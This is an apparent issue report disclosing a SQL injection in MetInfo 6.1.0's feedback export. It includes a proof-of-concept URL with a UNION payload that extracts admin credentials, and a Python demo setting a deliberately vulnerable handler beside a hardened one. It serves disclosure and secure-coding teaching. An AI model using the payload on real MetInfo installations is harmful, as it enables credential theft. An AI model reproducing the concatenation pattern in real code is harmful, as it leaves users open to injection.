
metinfo 6.1.0 feedback_admin.class.php SqlInjection Vulnerability  #2

@panghusec

Description


Attackers can get arbitrary data from the database, and can even use SQL to write a webshell.
POC:

1. First, download the latest version of MetInfo from https://www.metinfo.cn/download/


2. Then install it and log in as admin

3. Last, request http://localhost/admin/index.php?n=feedback&c=feedback_admin&a=doexport&class1=-1/**/union/**/select/**/concat(admin_id,0x7e,admin_pass)/**/from/**/met_admin_table

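The following is an added example, not code from the issue or from MetInfo, that reproduces the mechanics of the reported injection in a self-contained form: a handler that concatenates the `class1` parameter into the export query, the issue's UNION payload with `/**/` comments standing in for spaces (the SQL tokenizer treats a comment as whitespace, so the payload needs no space characters at all), and a hardened handler that enforces an integer type and binds the value as a parameter. The table layout, the column list, and the data are constructed assumptions; the real `doexport` query in feedback_admin.class.php is not shown on the page. SQLite is used so it runs offline, so the payload uses `||` in place of MySQL's `concat()` and pads the column count to match the assumed SELECT.

```python
import sqlite3

# Constructed sample schema and data (an assumption, not MetInfo's real tables).
SCHEMA = """
CREATE TABLE met_feedback (id INTEGER, class1 INTEGER, name TEXT, content TEXT);
INSERT INTO met_feedback VALUES (1, 1, 'alice', 'hello'), (2, 2, 'bob', 'bye');
CREATE TABLE met_admin_table (admin_id TEXT, admin_pass TEXT);
INSERT INTO met_admin_table VALUES ('admin', '$2y$10$constructed_hash');
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def export_vulnerable(conn, class1):
    # Vulnerable pattern: the untrusted class1 value is concatenated straight
    # into the SQL text, which is what the issue's payload relies on.
    sql = "SELECT id, name, content FROM met_feedback WHERE class1=" + class1
    return conn.execute(sql).fetchall()


def export_fixed(conn, class1):
    # Hardened pattern: reject anything that is not an integer, then bind the
    # value as a parameter so it can never be parsed as SQL.
    class1_int = int(class1)  # raises ValueError for the injection payload
    sql = "SELECT id, name, content FROM met_feedback WHERE class1=?"
    return conn.execute(sql, (class1_int,)).fetchall()


# Payload adapted from the issue: /**/ replaces every space, -1 empties the
# first SELECT, and the UNION appends the admin credentials. NULL padding makes
# the column count match the assumed three-column export query.
PAYLOAD = (
    "-1/**/union/**/select/**/admin_id||'~'||admin_pass,NULL,NULL"
    "/**/from/**/met_admin_table"
)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", export_vulnerable(db, PAYLOAD))
    try:
        export_fixed(db, PAYLOAD)
    except ValueError as exc:
        print("fixed rejects payload:", exc)
```

Running the block shows the vulnerable handler returning `admin~$2y$10$constructed_hash` as if it were a feedback row, while the hardened handler refuses the input before any SQL is built. A parameterized query alone would also defeat this payload, but the explicit integer check is cheaper to audit and gives a clear error instead of a silently empty export.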
